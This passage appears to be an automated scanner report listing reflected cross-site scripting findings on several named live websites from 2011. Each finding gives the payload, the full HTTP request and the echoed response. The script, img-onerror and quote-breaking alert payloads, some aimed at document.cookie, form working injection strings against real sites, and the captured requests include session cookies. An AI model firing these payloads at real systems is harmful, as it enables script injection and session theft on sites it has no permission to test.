<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatchaff57\"><script>alert(1)</script>29569e332da#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.31. http://financaspessoais.blog.br/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259b8"><script>alert(1)</script>8849500d1f1 was submitted in the utm_content parameter. This input was echoed as 259b8\"><script>alert(1)</script>8849500d1f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58259b8\"><script>alert(1)</script>8849500d1f1&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.32. http://financaspessoais.blog.br/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1033"><script>alert(1)</script>f894aad5354 was submitted in the utm_medium parameter. This input was echoed as e1033\"><script>alert(1)</script>f894aad5354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badgee1033"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:02 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badgee1033\"><script>alert(1)</script>f894aad5354&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.33. http://financaspessoais.blog.br/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab23b"><script>alert(1)</script>dbf1985e564 was submitted in the utm_source parameter. This input was echoed as ab23b\"><script>alert(1)</script>dbf1985e564 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=bloggerab23b"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:48 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=bloggerab23b\"><script>alert(1)</script>dbf1985e564&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.34. http://financaspessoais.blog.br/ [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45a3"><script>alert(1)</script>2751ef5eaae was submitted in the utm_term parameter. This input was echoed as a45a3\"><script>alert(1)</script>2751ef5eaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<form action="/?utm_source=blogger&utm_medium=badge&utm_term=rafael-limaa45a3\"><script>alert(1)</script>2751ef5eaae&utm_content=232-58&utm_campaign=blogwatch#wpcf7-f1-p30674-o1" method="post" class="wpcf7-form">
...[SNIP]...

4.35. http://flowplayer.org/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372 was submitted in the REST URL parameter 1. This input was echoed as 3018b"><img src=a onerror=alert(1)>23dd898c372 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tools3018b"><img%20src%3da%20onerror%3dalert(1)>23dd898c372/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /tools3018b&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;23dd898c372/
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:41 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5920


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="tools3018b"><img src=a onerror=alert(1)>23dd898c372" class="msie tools">
...[SNIP]...

4.36. http://flowplayer.org/tools/expose.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/expose.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5 was submitted in the REST URL parameter 1. This input was echoed as f3bd2"><img src=a onerror=alert(1)>edbe5526fa5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolsf3bd2"><img%20src%3da%20onerror%3dalert(1)>edbe5526fa5/expose.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /toolsf3bd2&quot;&gt;&lt;img%20src%3da%20onerror%3dalert(1)&gt;edbe5526fa5/expose.html
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:42 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 5835


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolsf3bd2"><img src=a onerror=alert(1)>edbe5526fa5_expose" class="msie tools">
...[SNIP]...

4.37. http://guru.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71359'%3balert(1)//beeb76ff9a8 was submitted in the h parameter. This input was echoed as 71359';alert(1)//beeb76ff9a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B6&w=160&h=60071359'%3balert(1)//beeb76ff9a8&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:59 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160" HEIGHT="60071359';alert(1)//beeb76ff9a8" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.38. http://guru.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91eec"%3balert(1)//b86b5220098 was submitted in the pid parameter. This input was echoed as 91eec";alert(1)//b86b5220098 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B691eec"%3balert(1)//b86b5220098&w=160&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:54 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B691eec";alert(1)//b86b5220098&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160" HEIGHT="600" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.39. http://guru.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255f6'%3balert(1)//86e0057d261 was submitted in the w parameter. This input was echoed as 255f6';alert(1)//86e0057d261 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=94699B6&w=160255f6'%3balert(1)//86e0057d261&h=600&rnd=3843100\ HTTP/1.1
Host: guru.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Wed, 19 Jan 2011 18:09:56 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=94699B6&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="160255f6';alert(1)//86e0057d261" HEIGHT="600" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.40. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbc5a'-alert(1)-'5b7885e79b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fbc5a'-alert(1)-'5b7885e79b2=1 HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:59 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=2zpeeq45alawxszruhbhql55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9991
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?fbc5a'-alert(1)-'5b7885e79b2=1';//]]>
...[SNIP]...

4.41. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload a088d<script>alert(1)</script>e11cd877bb9 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K08784a088d<script>alert(1)</script>e11cd877bb9&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 19 Jan 2011 18:01:06 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 18:01:06 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 18:01:05 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "K08784A088D<SCRIPT>ALERT(1)</SCRIPT>E11CD877BB9" was not recognized.
*/

4.42. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed76e'-alert(1)-'ef86bc64d25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:18 GMT
Server: TornadoServer/1.0
Content-Length: 2205
Connection: Close

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Oops (Error 404) - Performable</title>
<style type="text/css">
body {
font-family:"Lucida Gra
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-10161796-3']);
_gaq.push(['_trackPageview', '/errors/landesm.gfi.com/404/event-log-analysis-smed76e'-alert(1)-'ef86bc64d25/']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-
...[SNIP]...

4.43. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 10337<script>alert(1)</script>88629374d28 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1295452261577&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-6743622525202572&slotname=728x90A_General10337<script>alert(1)</script>88629374d28&page_slots=728x90A_General&cookie_enabled=1&ga_vid=1376446855.1295452262&ga_sid=1295452262&ga_hid=2080119672&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&lmt=1295473836&dt=1295452261654&cc=10&biw=950&bih=1012&ifi=1&adk=3889316276&u_tz=-360&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 19 Jan 2011 18:03:28 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2750

GA_googleSetAdContentsBySlotForSync({"728x90A_General10337<script>alert(1)</script>88629374d28":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.44. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb7d"><script>alert(1)</script>21b58676d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffb7d\\\"><script>alert(1)</script>21b58676d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ffb7d"><script>alert(1)</script>21b58676d82=1 HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 16:58:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Content-Length: 43014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="http://rafael.adm.br/page/2/?ffb7d\\\"><script>alert(1)</script>21b58676d82=1">
...[SNIP]...

